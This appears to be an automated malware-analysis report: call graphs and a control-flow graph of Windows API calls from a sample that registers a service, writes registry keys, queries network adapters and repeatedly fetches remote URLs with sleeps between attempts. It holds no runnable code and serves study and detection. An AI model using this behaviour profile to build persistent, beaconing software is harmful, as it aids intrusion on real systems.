2e33a11 20567->20569 20570 2e34e35 __gmtime64_s 9 API calls 20568->20570 20744 2e3395b 20569->20744 20570->20572 20572->19474 20577 2e335fc ___BuildCatchObject 20575->20577 20576 2e3360e 20578 2e35d9b __gmtime64_s 59 API calls 20576->20578 20577->20576 20579 2e3363b 20577->20579 20580 2e33613 20578->20580 20594 2e39808 20579->20594 20582 2e34e35 __gmtime64_s 9 API calls 20580->20582 20592 2e3361e ___BuildCatchObject @_EH4_CallFilterFunc@8 20582->20592 20583 2e33640 20584 2e33656 20583->20584 20585 2e33649 20583->20585 20587 2e3367f 20584->20587 20588 2e3365f 20584->20588 20586 2e35d9b __gmtime64_s 59 API calls 20585->20586 20586->20592 20609 2e39927 20587->20609 20589 2e35d9b __gmtime64_s 59 API calls 20588->20589 20589->20592 20592->20548 20595 2e39814 ___BuildCatchObject 20594->20595 20596 2e3882d __lock 59 API calls 20595->20596 20606 2e39822 20596->20606 20597 2e39896 20639 2e3991e 20597->20639 20598 2e3989d 20599 2e389f4 __malloc_crt 59 API calls 20598->20599 20602 2e398a4 20599->20602 20601 2e39913 ___BuildCatchObject 20601->20583 20602->20597 20603 2e3914c __mtinitlocks InitializeCriticalSectionAndSpinCount 20602->20603 20607 2e398ca RtlEnterCriticalSection 20603->20607 20604 2e388b5 __mtinitlocknum 59 API calls 20604->20606 20606->20597 20606->20598 20606->20604 20629 2e39771 20606->20629 20634 2e397db 20606->20634 20607->20597 20619 2e39944 20609->20619 20610 2e39958 20611 2e35d9b __gmtime64_s 59 API calls 20610->20611 20613 2e3995d 20611->20613 20612 2e39aff 20612->20610 20615 2e39b5b 20612->20615 20614 2e34e35 __gmtime64_s 9 API calls 20613->20614 20616 2e3368a 20614->20616 20650 2e40770 20615->20650 20626 2e336ac 20616->20626 20619->20610 20619->20612 20644 2e4078e 20619->20644 20623 2e408bd __openfile 59 API calls 20624 2e39b17 20623->20624 20624->20612 20625 2e408bd __openfile 59 API calls 20624->20625 20625->20612 20710 2e397a1 20626->20710 20628 2e336b2 20628->20592 20630 2e39792 RtlEnterCriticalSection 20629->20630 20631 2e3977c 20629->20631 20630->20606 20632 2e3882d __lock 59 API calls 20631->20632 20633 2e39785 20632->20633 20633->20606 20635 2e397e9 20634->20635 20636 2e397fc RtlLeaveCriticalSection 20634->20636 20642 2e38997 RtlLeaveCriticalSection 20635->20642 20636->20606 20638 2e397f9 20638->20606 20643 2e38997 RtlLeaveCriticalSection 20639->20643 20641 2e39925 20641->20601 20642->20638 20643->20641 20653 2e407a6 20644->20653 20646 2e39ac5 20646->20610 20647 2e408bd 20646->20647 20661 2e408d5 20647->20661 20649 2e39af8 20649->20612 20649->20623 20668 2e40659 20650->20668 20652 2e40789 20652->20616 20654 2e407b4 20653->20654 20655 2e407bb 20653->20655 20654->20646 20656 2e321bb _LocaleUpdate::_LocaleUpdate 59 API calls 20655->20656 20657 2e407c8 20656->20657 20657->20654 20658 2e35d9b __gmtime64_s 59 API calls 20657->20658 20659 2e407fb 20658->20659 20660 2e34e35 __gmtime64_s 9 API calls 20659->20660 20660->20654 20662 2e321bb _LocaleUpdate::_LocaleUpdate 59 API calls 20661->20662 20663 2e408e8 20662->20663 20664 2e35d9b __gmtime64_s 59 API calls 20663->20664 20667 2e408fd 20663->20667 20665 2e40929 20664->20665 20666 2e34e35 __gmtime64_s 9 API calls 20665->20666 20666->20667 20667->20649 20669 2e40665 ___BuildCatchObject 20668->20669 20670 2e4067b 20669->20670 20672 2e406b1 20669->20672 20671 2e35d9b __gmtime64_s 59 API calls 20670->20671 20673 2e40680 20671->20673 20679 2e40722 20672->20679 20675 2e34e35 __gmtime64_s 9 API calls 20673->20675 20678 2e4068a ___BuildCatchObject 20675->20678 20678->20652 20688 2e38176 20679->20688 20681 2e406cd 20684 2e406f6 20681->20684 20682 2e40736 20682->20681 20683 2e32eb4 _free 59 API calls 20682->20683 20683->20681 20685 2e406fc 20684->20685 20687 2e40720 20684->20687 20709 2e40f6d RtlLeaveCriticalSection 20685->20709 20687->20678 20689 2e38183 20688->20689 20690 2e38199 20688->20690 20691 2e35d9b __gmtime64_s 59 API calls 20689->20691 20690->20689 20694 2e381a0 ___crtIsPackagedApp 20690->20694 20692 2e38188 20691->20692 20693 2e34e35 __gmtime64_s 9 API calls 20692->20693 20702 2e38192 20693->20702 20695 2e381b6 MultiByteToWideChar 20694->20695 20696 2e381a9 AreFileApisANSI 20694->20696 20698 2e381e1 20695->20698 20699 2e381d0 GetLastError 20695->20699 20696->20695 20697 2e381b3 20696->20697 20697->20695 20701 2e389f4 __malloc_crt 59 API calls 20698->20701 20700 2e35d7a __dosmaperr 59 API calls 20699->20700 20700->20702 20703 2e381e9 20701->20703 20702->20682 20703->20702 20704 2e381f0 MultiByteToWideChar 20703->20704 20704->20702 20705 2e38206 GetLastError 20704->20705 20706 2e35d7a __dosmaperr 59 API calls 20705->20706 20707 2e38212 20706->20707 20708 2e32eb4 _free 59 API calls 20707->20708 20708->20702 20709->20687 20711 2e397b0 20710->20711 20712 2e397cf RtlLeaveCriticalSection 20710->20712 20711->20712 20713 2e397b7 20711->20713 20712->20628 20716 2e38997 RtlLeaveCriticalSection 20713->20716 20715 2e397cc 20715->20628 20716->20715 20718 2e39742 20717->20718 20719 2e39764 RtlEnterCriticalSection 20717->20719 20718->20719 20720 2e3974a 20718->20720 20721 2e33891 20719->20721 20722 2e3882d __lock 59 API calls 20720->20722 20723 2e336f0 20721->20723 20722->20721 20725 2e336ff 20723->20725 20731 2e3371d 20723->20731 20724 2e3370d 20726 2e35d9b __gmtime64_s 59 API calls 20724->20726 20725->20724 20729 2e33737 _memmove 20725->20729 20725->20731 20727 2e33712 20726->20727 20728 2e34e35 __gmtime64_s 9 API calls 20727->20728 20728->20731 20730 2e35e41 __flsbuf 79 API calls 20729->20730 20729->20731 20733 2e39d71 __flush 59 API calls 20729->20733 20734 2e39d95 __write 79 API calls 20729->20734 20738 2e3a72f 20729->20738 20730->20729 20735 2e338c3 20731->20735 20733->20729 20734->20729 20736 2e397a1 __fsopen 2 API calls 20735->20736 20737 2e338c9 20736->20737 20737->20554 20739 2e3a742 20738->20739 20743 2e3a766 20738->20743 20740 2e39d71 __flush 59 API calls 20739->20740 20739->20743 20741 2e3a75f 20740->20741 20742 2e39d95 __write 79 API calls 20741->20742 20742->20743 20743->20729 20745 2e3396a 20744->20745 20746 2e3397e 20744->20746 20747 2e35d9b __gmtime64_s 59 API calls 20745->20747 20749 2e3a72f __flush 79 API calls 20746->20749 20758 2e3397a 20746->20758 20748 2e3396f 20747->20748 20750 2e34e35 __gmtime64_s 9 API calls 20748->20750 20751 2e3398a 20749->20751 20750->20758 20763 2e3b1db 20751->20763 20754 2e39d71 __flush 59 API calls 20755 2e33998 20754->20755 20767 2e3b066 20755->20767 20757 2e3399e 20757->20758 20759 2e32eb4 _free 59 API calls 20757->20759 20760 2e33a36 20758->20760 20759->20758 20761 2e397a1 __fsopen 2 API calls 20760->20761 20762 2e33a3c 20761->20762 20762->20572 20764 2e3b1e8 20763->20764 20766 2e33992 20763->20766 20765 2e32eb4 _free 59 API calls 20764->20765 20764->20766 20765->20766 20766->20754 20768 2e3b072 ___BuildCatchObject 20767->20768 20769 2e3b096 20768->20769 20770 2e3b07f 20768->20770 20772 2e3b121 20769->20772 20774 2e3b0a6 20769->20774 20771 2e35d67 __dosmaperr 59 API calls 20770->20771 20773 2e3b084 20771->20773 20775 2e35d67 __dosmaperr 59 API calls 20772->20775 20776 2e35d9b __gmtime64_s 59 API calls 20773->20776 20777 2e3b0c4 20774->20777 20778 2e3b0ce 20774->20778 20782 2e3b0c9 20775->20782 20786 2e3b08b ___BuildCatchObject 20776->20786 20779 2e35d67 __dosmaperr 59 API calls 20777->20779 20780 2e40bc7 ___lock_fhandle 60 API calls 20778->20780 20779->20782 20781 2e3b0d4 20780->20781 20784 2e3b0f2 20781->20784 20785 2e3b0e7 20781->20785 20783 2e35d9b __gmtime64_s 59 API calls 20782->20783 20787 2e3b12d 20783->20787 20790 2e35d9b __gmtime64_s 59 API calls 20784->20790 20793 2e3b141 20785->20793 20786->20757 20788 2e34e35 __gmtime64_s 9 API calls 20787->20788 20788->20786 20791 2e3b0ed 20790->20791 20808 2e3b119 20791->20808 20794 2e40e84 __lseeki64_nolock 59 API calls 20793->20794 20797 2e3b14f 20794->20797 20795 2e3b1a5 20811 2e40dfe 20795->20811 20797->20795 20799 2e40e84 __lseeki64_nolock 59 API calls 20797->20799 20807 2e3b183 20797->20807 20801 2e3b17a 20799->20801 20800 2e40e84 __lseeki64_nolock 59 API calls 20802 2e3b18f CloseHandle 20800->20802 20806 2e40e84 __lseeki64_nolock 59 API calls 20801->20806 20802->20795 20803 2e3b19b GetLastError 20802->20803 20803->20795 20804 2e35d7a __dosmaperr 59 API calls 20805 2e3b1cf 20804->20805 20805->20791 20806->20807 20807->20795 20807->20800 20820 2e40f6d RtlLeaveCriticalSection 20808->20820 20810 2e3b11f 20810->20786 20812 2e40e6a 20811->20812 20815 2e40e0a 20811->20815 20813 2e35d9b __gmtime64_s 59 API calls 20812->20813 20814 2e40e6f 20813->20814 20816 2e35d67 __dosmaperr 59 API calls 20814->20816 20815->20812 20818 2e40e33 20815->20818 20817 2e3b1ad 20816->20817 20817->20804 20817->20805 20818->20817 20819 2e40e55 SetStdHandle 20818->20819 20819->20817 20820->20810 20821 40b389 lstrcmpiW 20822 40224f lstrcmpiW 20825 4022e8 20822->20825 20823 40b3d7 20824 40ba56 StartServiceCtrlDispatcherA 20823->20824 20826 40ba5d 20824->20826 20825->20823 20827 40ba94 20825->20827 20828 40b3cb SetEvent 20825->20828 20826->20826 20828->20823 20829 2e871e7 20830 2e8bb98 WriteFile 20829->20830 20832 2ea24d7 20830->20832 20833 402794 20834 40b84f RegCloseKey 20833->20834 20835 402616 20836 40b880 RegOpenKeyExA 20835->20836 20837 4021f0 20835->20837 20836->20837 20838 402d60 GetVersion 20862 4039f0 HeapCreate 20838->20862 20840 402dbf 20841 402dc4 20840->20841 20842 402dcc 20840->20842 20937 402e7b 20841->20937 20874 4036d0 20842->20874 20846 402dd4 GetCommandLineA 20888 40359e 20846->20888 20850 402dee 20920 403298 20850->20920 20852 402df3 20853 402df8 GetStartupInfoA 20852->20853 20933 403240 20853->20933 20855 402e0a GetModuleHandleA 20857 402e2e 20855->20857 20943 402fe7 20857->20943 20863 403a10 20862->20863 20864 403a46 20862->20864 20950 4038a8 20863->20950 20864->20840 20867 403a2c 20869 403a49 20867->20869 20964 404618 20867->20964 20868 403a1f 20962 403dc7 HeapAlloc 20868->20962 20869->20840 20872 403a29 20872->20869 20873 403a3a HeapDestroy 20872->20873 20873->20864 21027 402e9f 20874->21027 20877 4036ef GetStartupInfoA 20880 40373b 20877->20880 20885 403800 20877->20885 20883 402e9f 12 API calls 20880->20883 20880->20885 20886 4037ac 20880->20886 20881 403867 SetHandleCount 20881->20846 20882 403827 GetStdHandle 20884 403835 GetFileType 20882->20884 20882->20885 20883->20880 20884->20885 20885->20881 20885->20882 20886->20885 20887 4037ce GetFileType 20886->20887 20887->20886 20889 4035b9 GetEnvironmentStringsW 20888->20889 20890 4035ec 20888->20890 20891 4035c1 20889->20891 20892 4035cd GetEnvironmentStrings 20889->20892 20890->20891 20893 4035dd 20890->20893 20895 403605 WideCharToMultiByte 20891->20895 20896 4035f9 GetEnvironmentStringsW 20891->20896 20892->20893 20894 402de4 20892->20894 20893->20894 20897 40368b 20893->20897 20898 40367f GetEnvironmentStrings 20893->20898 20911 403351 20894->20911 20900 403639 20895->20900 20901 40366b FreeEnvironmentStringsW 20895->20901 20896->20894 20896->20895 20902 402e9f 12 API calls 20897->20902 20898->20894 20898->20897 20903 402e9f 12 API calls 20900->20903 20901->20894 20909 4036a6 20902->20909 20904 40363f 20903->20904 20904->20901 20905 403648 WideCharToMultiByte 20904->20905 20907 403662 20905->20907 20908 403659 20905->20908 20906 4036bc FreeEnvironmentStringsA 20906->20894 20907->20901 21093 402f51 20908->21093 20909->20906 20912 403363 20911->20912 20913 403368 GetModuleFileNameA 20911->20913 21123 405042 20912->21123 20915 40338b 20913->20915 20916 402e9f 12 API calls 20915->20916 20917 4033ac 20916->20917 20918 4033bc 20917->20918 20919 402e56 7 API calls 20917->20919 20918->20850 20919->20918 20921 4032a5 20920->20921 20923 4032aa 20920->20923 20922 405042 19 API calls 20921->20922 20922->20923 20924 402e9f 12 API calls 20923->20924 20925 4032d7 20924->20925 20926 402e56 7 API calls 20925->20926 20932 4032eb 20925->20932 20926->20932 20927 40332e 20928 402f51 7 API calls 20927->20928 20929 40333a 20928->20929 20929->20852 20930 402e9f 12 API calls 20930->20932 20931 402e56 7 API calls 20931->20932 20932->20927 20932->20930 20932->20931 20934 403249 20933->20934 20936 40324e 20933->20936 20935 405042 19 API calls 20934->20935 20935->20936 20936->20855 20936->20936 20938 402e84 20937->20938 20939 402e89 20937->20939 20940 403c20 7 API calls 20938->20940 20941 403c59 7 API calls 20939->20941 20940->20939 20942 402e92 ExitProcess 20941->20942 21147 403009 20943->21147 20946 4030bc 20947 4030c8 20946->20947 20948 4031f1 UnhandledExceptionFilter 20947->20948 20949 402e48 20947->20949 20948->20949 20973 402c40 20950->20973 20953 4038d1 20954 4038eb GetEnvironmentVariableA 20953->20954 20955 4038e3 20953->20955 20957 40390a 20954->20957 20961 4039c8 20954->20961 20955->20867 20955->20868 20958 40394f GetModuleFileNameA 20957->20958 20960 403947 20957->20960 20958->20960 20960->20961 20975 40505e 20960->20975 20961->20955 20978 40387b GetModuleHandleA 20961->20978 20963 403de3 20962->20963 20963->20872 20965 404625 20964->20965 20966 40462c HeapAlloc 20964->20966 20967 404649 VirtualAlloc 20965->20967 20966->20967 20968 404681 20966->20968 20969 404669 VirtualAlloc 20967->20969 20970 40473e 20967->20970 20968->20872 20969->20968 20971 404730 VirtualFree 20969->20971 20970->20968 20972 404746 HeapFree 20970->20972 20971->20970 20972->20968 20974 402c4c GetVersionExA 20973->20974 20974->20953 20974->20954 20980 405075 20975->20980 20979 403892 20978->20979 20979->20955 20982 40508d 20980->20982 20984 4050bd 20982->20984 20987 405d39 20982->20987 20983 405d39 6 API calls 20983->20984 20984->20983 20986 405071 20984->20986 20991 405c6d 20984->20991 20986->20961 20988 405d57 20987->20988 20990 405d4b 20987->20990 20997 405b24 20988->20997 20990->20982 20992 405c98 20991->20992 20996 405c7b 20991->20996 20993 405cb4 20992->20993 20994 405d39 6 API calls 20992->20994 20993->20996 21009 4058d5 20993->21009 20994->20993 20996->20984 20998 405b6d 20997->20998 20999 405b55 GetStringTypeW 20997->20999 21001 405b98 GetStringTypeA 20998->21001 21002 405bbc 20998->21002 20999->20998 21000 405b71 GetStringTypeA 20999->21000 21000->20998 21003 405c59 21000->21003 21001->21003 21002->21003 21005 405bd2 MultiByteToWideChar 21002->21005 21003->20990 21005->21003 21006 405bf6 21005->21006 21006->21003 21007 405c30 MultiByteToWideChar 21006->21007 21007->21003 21008 405c49 GetStringTypeW 21007->21008 21008->21003 21010 405905 LCMapStringW 21009->21010 21011 405921 21009->21011 21010->21011 21012 405929 LCMapStringA 21010->21012 21013 405987 21011->21013 21014 40596a LCMapStringA 21011->21014 21012->21011 21015 405a63 21012->21015 21013->21015 21016 40599d MultiByteToWideChar 21013->21016 21014->21015 21015->20996 21016->21015 21017 4059c7 21016->21017 21017->21015 21018 4059fd MultiByteToWideChar 21017->21018 21018->21015 21019 405a16 LCMapStringW 21018->21019 21019->21015 21020 405a31 21019->21020 21021 405a37 21020->21021 21023 405a77 21020->21023 21021->21015 21022 405a45 LCMapStringW 21021->21022 21022->21015 21023->21015 21024 405aaf LCMapStringW 21023->21024 21024->21015 21025 405ac7 WideCharToMultiByte 21024->21025 21025->21015 21036 402eb1 21027->21036 21030 402e56 21031 402e64 21030->21031 21032 402e5f 21030->21032 21079 403c59 21031->21079 21073 403c20 21032->21073 21037 402eae 21036->21037 21039 402eb8 21036->21039 21037->20877 21037->21030 21039->21037 21040 402edd 21039->21040 21041 402eec 21040->21041 21043 402f01 21040->21043 21045 402efa 21041->21045 21049 404163 21041->21049 21044 402f40 HeapAlloc 21043->21044 21043->21045 21055 404910 21043->21055 21046 402f4f 21044->21046 21045->21044 21045->21046 21047 402eff 21045->21047 21046->21039 21047->21039 21051 404195 21049->21051 21050 404243 21050->21045 21051->21050 21054 404234 21051->21054 21062 40446c 21051->21062 21054->21050 21069 40451d 21054->21069 21056 40491e 21055->21056 21057 404adf 21056->21057 21058 4049db 21056->21058 21061 404a0a VirtualAlloc 21056->21061 21059 404618 5 API calls 21057->21059 21058->21045 21059->21058 21061->21058 21063 4044af HeapAlloc 21062->21063 21064 40447f HeapReAlloc 21062->21064 21065 4044d5 VirtualAlloc 21063->21065 21068 4044ff 21063->21068 21066 40449e 21064->21066 21064->21068 21067 4044ef HeapFree 21065->21067 21065->21068 21066->21063 21067->21068 21068->21054 21070 40452f VirtualAlloc 21069->21070 21072 404578 21070->21072 21072->21050 21074 403c2a 21073->21074 21075 403c59 7 API calls 21074->21075 21078 403c57 21074->21078 21076 403c41 21075->21076 21077 403c59 7 API calls 21076->21077 21077->21078 21078->21031 21083 403c6c 21079->21083 21080 402e6d 21080->20877 21081 403d83 21085 403d96 GetStdHandle WriteFile 21081->21085 21082 403cac 21082->21080 21084 403cb8 GetModuleFileNameA 21082->21084 21083->21080 21083->21081 21083->21082 21086 403cd0 21084->21086 21085->21080 21088 405408 21086->21088 21089 405415 LoadLibraryA 21088->21089 21092 405457 21088->21092 21090 405426 GetProcAddress 21089->21090 21089->21092 21091 40543d GetProcAddress GetProcAddress 21090->21091 21090->21092 21091->21092 21092->21080 21094 402f79 21093->21094 21095 402f5d 21093->21095 21094->20907 21096 402f67 21095->21096 21097 402f7d 21095->21097 21099 402fa9 HeapFree 21096->21099 21100 402f73 21096->21100 21098 402fa8 21097->21098 21101 402f97 21097->21101 21098->21099 21099->21094 21104 403e3a 21100->21104 21110 4048cb 21101->21110 21105 403e78 21104->21105 21109 40412e 21104->21109 21106 404074 VirtualFree 21105->21106 21105->21109 21107 4040d8 21106->21107 21108 4040e7 VirtualFree HeapFree 21107->21108 21107->21109 21108->21109 21109->21094 21111 4048f8 21110->21111 21112 40490e 21110->21112 21111->21112 21114 4047b2 21111->21114 21112->21094 21117 4047bf 21114->21117 21115 40486f 21115->21112 21116 4047e0 VirtualFree 21116->21117 21117->21115 21117->21116 21119 40475c VirtualFree 21117->21119 21120 404779 21119->21120 21121 4047a9 21120->21121 21122 404789 HeapFree 21120->21122 21121->21117 21122->21117 21124 40504b 21123->21124 21125 405052 21123->21125 21127 404c7e 21124->21127 21125->20913 21134 404e17 21127->21134 21131 404cc1 GetCPInfo 21133 404cd5 21131->21133 21132 404e0b 21132->21125 21133->21132 21139 404ebd GetCPInfo 21133->21139 21135 404e37 21134->21135 21136 404e27 GetOEMCP 21134->21136 21137 404c8f 21135->21137 21138 404e3c GetACP 21135->21138 21136->21135 21137->21131 21137->21132 21137->21133 21138->21137 21140 404ee0 21139->21140 21146 404fa8 21139->21146 21141 405b24 6 API calls 21140->21141 21142 404f5c 21141->21142 21143 4058d5 9 API calls 21142->21143 21144 404f80 21143->21144 21145 4058d5 9 API calls 21144->21145 21145->21146 21146->21132 21148 403015 GetCurrentProcess TerminateProcess 21147->21148 21149 403026 21147->21149 21148->21149 21150 402e37 21149->21150 21151 403090 ExitProcess 21149->21151 21150->20946 21152 402225 21153 4022d9 RegSetValueExA RegCloseKey 21152->21153 21154 4022e8 SetEvent 21153->21154 21156 40b3d7 21154->21156 21157 40ba56 StartServiceCtrlDispatcherA 21156->21157 21158 40ba5d 21157->21158 21158->21158 21159 4026a6 OpenSCManagerA 21160 40278e 21159->21160 21161 2e6fec1 21162 2e71738 CreateFileA 21161->21162 21164 401f27 21165 401f3c 21164->21165 21168 401a1d 21165->21168 21167 401f45 21169 401a2c 21168->21169 21174 401a4f CreateFileA 21169->21174 21173 401a3e 21173->21167 21175 401a35 21174->21175 21178 401a7d 21174->21178 21182 401b4b LoadLibraryA 21175->21182 21176 401a98 DeviceIoControl 21176->21178 21178->21176 21179 401b3a CloseHandle 21178->21179 21180 401b0e GetLastError 21178->21180 21191 402ba6 21178->21191 21194 402b98 21178->21194 21179->21175 21180->21178 21180->21179 21183 401c21 21182->21183 21184 401b6e GetProcAddress 21182->21184 21183->21173 21185 401c18 FreeLibrary 21184->21185 21189 401b85 21184->21189 21185->21183 21186 401b95 GetAdaptersInfo 21186->21189 21187 402ba6 7 API calls 21187->21189 21188 401c15 21188->21185 21189->21186 21189->21187 21189->21188 21190 402b98 12 API calls 21189->21190 21190->21189 21192 402f51 7 API calls 21191->21192 21193 402baf 21192->21193 21193->21178 21195 402eb1 12 API calls 21194->21195 21196 402ba3 21195->21196 21196->21178 21197 2e5e002 21198 2e5e080 21197->21198 21199 2e5e009 21197->21199 21201 2e5fa26 DeleteFileA 21198->21201 21202 2e64646 21201->21202 21203 2e2648b RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 21281 2e242c7 21203->21281 21282 40b12b CreateDirectoryA 21283 40ba50 21282->21283 21284 40b5ec Sleep 21285 40ba9c 21284->21285 21286 2e2104d 21287 2e332e7 __cinit 68 API calls 21286->21287 21288 2e21057 21287->21288 21291 2e21aa9 InterlockedIncrement 21288->21291 21292 2e21ac5 WSAStartup InterlockedExchange 21291->21292 21293 2e2105c 21291->21293 21292->21293 21294 2e2f7d6 CreateFileA 21295 2e2f8d2 21294->21295 21300 2e2f807 21294->21300 21296 2e2f81f DeviceIoControl 21296->21300 21297 2e2f8c8 CloseHandle 21297->21295 21298 2e2f894 GetLastError 21298->21297 21298->21300 21299 2e33a8f _Allocate 60 API calls 21299->21300 21300->21296 21300->21297 21300->21298 21300->21299 21301 2e786d0 21302 2e8990b ReadFile 21301->21302 21304 2e2f8da LoadLibraryA 21305 2e2f903 GetProcAddress 21304->21305 21306 2e2f9bd 21304->21306 21307 2e2f9b6 FreeLibrary 21305->21307 21310 2e2f917 21305->21310 21307->21306 21308 2e2f929 GetAdaptersInfo 21308->21310 21309 2e2f9b1 21309->21307 21310->21308 21310->21309 21311 2e33a8f _Allocate 60 API calls 21310->21311 21311->21310 21312 40b13b 21313 40ba29 VirtualAlloc 21312->21313 21314 4022bc 21315 40b0ce RegCreateKeyExA 21314->21315 21317 40223d GetLastError 21318 40b500 LoadLibraryExA 21317->21318 21319 40b3ff 21320 40b51b RegQueryValueExA 21319->21320

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 2e272ab-2e272c3 InternetOpenA 1 2e27389-2e2738f 0->1 2 2e272c9-2e2731d InternetSetOptionA * 3 call 2e34a30 0->2 4 2e27391-2e27397 1->4 5 2e273ab-2e273b9 1->5 8 2e27322-2e27340 InternetOpenUrlA 2->8 9 2e27399-2e2739b 4->9 10 2e2739d-2e273aa call 2e253ec 4->10 6 2e266f4-2e266f6 5->6 7 2e273bf-2e273e3 call 2e34a30 call 2e2439c 5->7 13 2e266f8-2e266fd 6->13 14 2e266ff-2e26701 6->14 7->6 31 2e273e9-2e27417 RtlEnterCriticalSection RtlLeaveCriticalSection call 2e3227c 7->31 15 2e27382-2e27383 InternetCloseHandle 8->15 16 2e27342 8->16 9->5 10->5 21 2e26708 Sleep 13->21 18 2e26703 14->18 19 2e2670e-2e26742 RtlEnterCriticalSection RtlLeaveCriticalSection 14->19 15->1 22 2e27346-2e2736c InternetReadFile 16->22 18->21 26 2e26792 19->26 27 2e26744-2e26750 19->27 21->19 24 2e27377-2e2737e InternetCloseHandle 22->24 25 2e2736e-2e27375 22->25 24->15 25->22 30 2e26796 26->30 27->26 29 2e26752-2e2675f 27->29 32 2e26761-2e26765 29->32 33 2e26767-2e26768 29->33 30->0 38 2e27419-2e2742b call 2e3227c 31->38 39 2e2746d-2e27488 call 2e3227c 31->39 34 2e2676c-2e26790 call 2e34a30 * 2 32->34 33->34 34->30 38->39 49 2e2742d-2e2743f call 2e3227c 38->49 47 2e27742-2e27754 call 2e3227c 39->47 48 2e2748e-2e27490 39->48 57 2e27756-2e27758 47->57 58 2e2779d-2e277a6 call 2e3227c 47->58 48->47 51 2e27496-2e27548 call 2e32eec RtlEnterCriticalSection RtlLeaveCriticalSection call 2e34a30 * 5 call 2e2439c * 2 48->51 49->39 56 2e27441-2e27453 call 2e3227c 49->56 115 2e27585 51->115 116 2e2754a-2e2754c 51->116 56->39 70 2e27455-2e27467 call 2e3227c 56->70 57->58 62 2e2775a-2e27798 call 2e34a30 RtlEnterCriticalSection RtlLeaveCriticalSection 57->62 65 2e277ab-2e277af 58->65 62->6 71 2e277d0-2e277e2 call 2e3227c 65->71 72 2e277b1-2e277bf call 2e261f5 call 2e26303 65->72 70->6 70->39 83 2e27b00-2e27b12 call 2e3227c 71->83 84 2e277e8-2e277ea 71->84 86 2e277c4-2e277cb call 2e2640e 72->86 83->6 96 2e27b18-2e27b46 call 2e32eec call 2e34a30 call 2e2439c 83->96 84->83 88 2e277f0-2e27807 call 2e2439c 84->88 86->6 88->6 97 2e2780d-2e278db call 2e32358 call 2e21ba7 88->97 117 2e27b48-2e27b4a call 2e2534d 96->117 118 2e27b4f-2e27b56 call 2e32eb4 96->118 113 2e278e2-2e27903 RtlEnterCriticalSection 97->113 114 2e278dd call 2e2143f 97->114 121 2e27905-2e2790c 113->121 122 2e2790f-2e27945 RtlLeaveCriticalSection call 2e23c67 call 2e23d7e 113->122 114->113 119 2e27589-2e275b7 call 2e32eec call 2e34a30 call 2e2439c 115->119 116->115 123 2e2754e-2e27560 call 2e3227c 116->123 117->118 118->6 146 2e275f8-2e27601 call 2e32eb4 119->146 147 2e275b9-2e275c8 call 2e33529 119->147 121->122 138 2e2794a-2e27967 call 2e2826e 122->138 123->115 133 2e27562-2e27583 call 2e2439c 123->133 133->119 142 2e2796c-2e27973 138->142 144 2e27ae7-2e27afb call 2e28f36 142->144 145 2e27979-2e279b3 call 2e2a658 142->145 144->6 152 2e279b8-2e279c1 145->152 158 2e27607-2e2761f call 2e33a8f 146->158 159 2e27738-2e2773b 146->159 147->146 160 2e275ca 147->160 156 2e27ab1-2e27ae2 call 2e2831d call 2e233b2 152->156 157 2e279c7-2e279ce 152->157 156->144 162 2e279d1-2e279d6 157->162 172 2e27621-2e27629 call 2e2966a 158->172 173 2e2762b 158->173 159->47 164 2e275cf-2e275e1 call 2e32790 160->164 162->162 167 2e279d8-2e27a15 call 2e2a658 162->167 175 2e275e3 164->175 176 2e275e6-2e275f6 call 2e33529 164->176 177 2e27a1a-2e27a23 167->177 174 2e2762d-2e27661 call 2e2a782 call 2e23863 172->174 173->174 188 2e27666-2e27682 call 2e25119 174->188 175->176 176->146 176->164 177->156 181 2e27a29-2e27a2f 177->181 185 2e27a32-2e27a37 181->185 185->185 187 2e27a39-2e27a74 call 2e2a658 185->187 187->156 193 2e27a76-2e27aaa call 2e2d04a 187->193 192 2e27687-2e276b8 call 2e23863 call 2e2aa28 188->192 199 2e276bd-2e276cf call 2e2ab42 192->199 196 2e27aaf-2e27ab0 193->196 196->156 201 2e276d4-2e276e5 199->201 202 2e276e7 call 2e2380b 201->202 203 2e276ec-2e276fb Sleep 201->203 202->203 204 2e27703-2e27717 call 2e31830 203->204 207 2e27723-2e27731 204->207 208 2e27719-2e27722 call 2e24100 204->208 207->159 210 2e27733 call 2e2380b 207->210 208->207 210->159
                                                                            APIs
                                                                            • Sleep.KERNELBASE(0000EA60), ref: 02E26708
                                                                            • RtlEnterCriticalSection.NTDLL(02E571B8), ref: 02E26713
                                                                            • RtlLeaveCriticalSection.NTDLL(02E571B8), ref: 02E26724
                                                                            • _memset.LIBCMT ref: 02E26779
                                                                            • _memset.LIBCMT ref: 02E26788
                                                                            • InternetOpenA.WININET(?), ref: 02E272B5
                                                                            • InternetSetOptionA.WININET(00000000,00000002,?), ref: 02E272DD
                                                                            • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02E272F5
                                                                            • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02E2730D
                                                                            • _memset.LIBCMT ref: 02E2731D
                                                                            • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 02E27336
                                                                            • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02E27358
                                                                            • InternetCloseHandle.WININET(00000000), ref: 02E27378
                                                                            • InternetCloseHandle.WININET(00000000), ref: 02E27383
                                                                            • _memset.LIBCMT ref: 02E273CB
                                                                            • RtlEnterCriticalSection.NTDLL(02E571B8), ref: 02E273EE
                                                                            • RtlLeaveCriticalSection.NTDLL(02E571B8), ref: 02E273FF
                                                                            • _malloc.LIBCMT ref: 02E27498
                                                                            • RtlEnterCriticalSection.NTDLL(02E571B8), ref: 02E274AA
                                                                            • RtlLeaveCriticalSection.NTDLL(02E571B8), ref: 02E274B6
                                                                            • _memset.LIBCMT ref: 02E274D0
                                                                            • _memset.LIBCMT ref: 02E274DF
                                                                            • _memset.LIBCMT ref: 02E274EF
                                                                            • _memset.LIBCMT ref: 02E27502
                                                                            • _memset.LIBCMT ref: 02E27518
                                                                            • _malloc.LIBCMT ref: 02E2758E
                                                                            • _memset.LIBCMT ref: 02E2759F
                                                                            • _strtok.LIBCMT ref: 02E275BF
                                                                            • _swscanf.LIBCMT ref: 02E275D6
                                                                            • _strtok.LIBCMT ref: 02E275ED
                                                                            • _free.LIBCMT ref: 02E275F9
                                                                            • Sleep.KERNEL32(000007D0), ref: 02E276F1
                                                                            • _memset.LIBCMT ref: 02E27765
                                                                            • RtlEnterCriticalSection.NTDLL(02E571B8), ref: 02E27772
